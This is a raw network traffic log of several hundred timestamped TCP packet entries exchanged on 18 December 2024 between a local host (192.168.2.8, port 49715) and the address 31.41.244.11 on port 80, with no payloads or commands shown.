Dec 18, 2024 13:38:33.670531034 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.674823046 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.674879074 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.674890041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.674937963 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.679428101 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.679488897 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.679547071 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.679598093 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.684062958 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.684123039 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.684199095 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.684259892 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.688735008 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.688800097 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.780267000 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.780409098 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.780493021 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.780493021 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.783087015 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.783149958 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.783303022 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.783365011 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.786742926 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.786801100 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.788583994 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.788597107 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.788641930 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.791546106 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.791582108 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.791610956 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.791642904 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.795166969 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.795222998 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.795344114 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.795403004 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.798427105 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.798485041 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.798568964 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.798623085 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.801481962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.801554918 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.801589012 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.801641941 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.804400921 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.804459095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.804501057 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.804552078 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.807605982 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.807673931 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.807801962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.807847977 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.810808897 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.810862064 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.810894012 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.810966015 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.813865900 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.813878059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.813927889 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.816947937 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.817003965 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.817370892 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.817420959 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.820148945 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.820162058 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.820197105 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.820234060 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.823137999 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.823205948 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.823302031 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.823350906 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.826256037 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.826309919 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.826354980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.826404095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.829607010 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.829663038 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.829685926 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.829745054 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.832515955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.832564116 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.832568884 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.832623005 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.832623005 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.835612059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.835660934 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.835725069 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.835786104 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.838882923 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.838895082 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.838937998 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.838974953 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.841851950 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.841908932 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.841979980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.842051983 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.845029116 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.845089912 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.845160961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.845211983 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.848149061 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.848196030 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.848207951 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.848242044 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.851254940 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.851269007 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.851308107 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.851325035 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.854515076 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.854568958 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.854578972 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.854614019 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.857541084 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.857599974 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.857698917 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.857748985 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.860599995 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.860650063 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.860723019 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.860766888 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.863823891 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.863868952 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.863873005 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.863914013 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.866813898 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.866871119 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.866957903 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.867033005 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.870791912 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.870855093 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.871680021 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.871728897 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.874283075 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.874344110 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.874367952 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.874423027 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.876800060 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.876863956 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.876930952 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.876976967 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.879534006 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.879604101 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.879654884 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.879709959 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.882428885 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.882496119 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.882515907 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.882569075 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.885572910 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.885658026 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.885704041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.885773897 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.888695955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.888750076 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.979844093 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.979932070 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.979943037 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.979996920 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.980969906 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.981048107 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.981704950 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.981801987 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.981806993 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.981878042 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.983747005 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.983808041 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.983828068 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.983886003 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.986136913 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.986150980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.986203909 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.988436937 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.988449097 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.988501072 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.990535021 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.990699053 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.990709066 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.990753889 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.992810011 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.992866039 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.992872000 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.992924929 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.995090961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.995146990 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.995193958 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.995249987 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.997162104 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.997224092 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.997302055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.997353077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.999380112 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.999444008 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.999483109 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.999536037 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.001436949 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.001493931 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.001565933 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.001617908 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.003618956 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.003674030 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.003819942 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.003870010 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.005597115 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.005650997 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.005718946 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.005773067 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.007746935 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.007802010 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.007843018 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.007895947 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.009735107 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.009788990 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.009922028 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.009974003 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.011673927 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.011728048 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.011873960 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.011925936 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.013664007 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.013731003 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.013813972 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.013869047 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.015656948 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.015713930 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.015855074 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.015927076 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.017638922 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.017700911 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.017761946 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.017816067 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.019759893 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.019814014 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.019815922 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.019865036 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.021687031 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.021742105 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.021800041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.021872044 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.023914099 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.023969889 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.024065971 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.024121046 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.025840998 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.025851965 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.025901079 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.027811050 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.027873993 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.027940989 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.027990103 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.029740095 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.029800892 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.029973030 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.030029058 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.031728983 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.031784058 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.031898975 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.031953096 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.033651114 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.033705950 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.033746004 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.033798933 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.035728931 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.035784006 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.035862923 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.035919905 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.037667036 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.037728071 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.037775040 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.037827969 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.039673090 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.039730072 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.039784908 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.039855957 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.041598082 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.041656971 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.041706085 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.041762114 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.043751955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.043867111 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.043910027 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.043942928 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.045820951 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.045902014 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.045909882 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.046008110 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.047734976 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.047748089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.047801018 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.049613953 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.049666882 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.049844980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.049904108 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.051584005 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.051646948 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.051709890 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.051755905 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.053807974 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.053827047 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.053870916 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.055727005 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.055749893 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.055780888 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.055804968 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.057706118 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.057764053 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.057813883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.057862997 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.059715986 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.059772015 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.059772968 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.059829950 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.061623096 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.061676979 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.061827898 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.061881065 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.063623905 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.063673973 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.063708067 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.063755989 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.065617085 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.065677881 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.065768957 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.065818071 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.067583084 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.067641020 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.067702055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.067773104 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.069716930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.069749117 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.069777966 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.069787979 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.071774006 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.071850061 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.071890116 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.071938038 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.073710918 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.073759079 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.073807955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.073854923 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.075555086 CET	80	49715	31.41.244.11	192.168.2.8
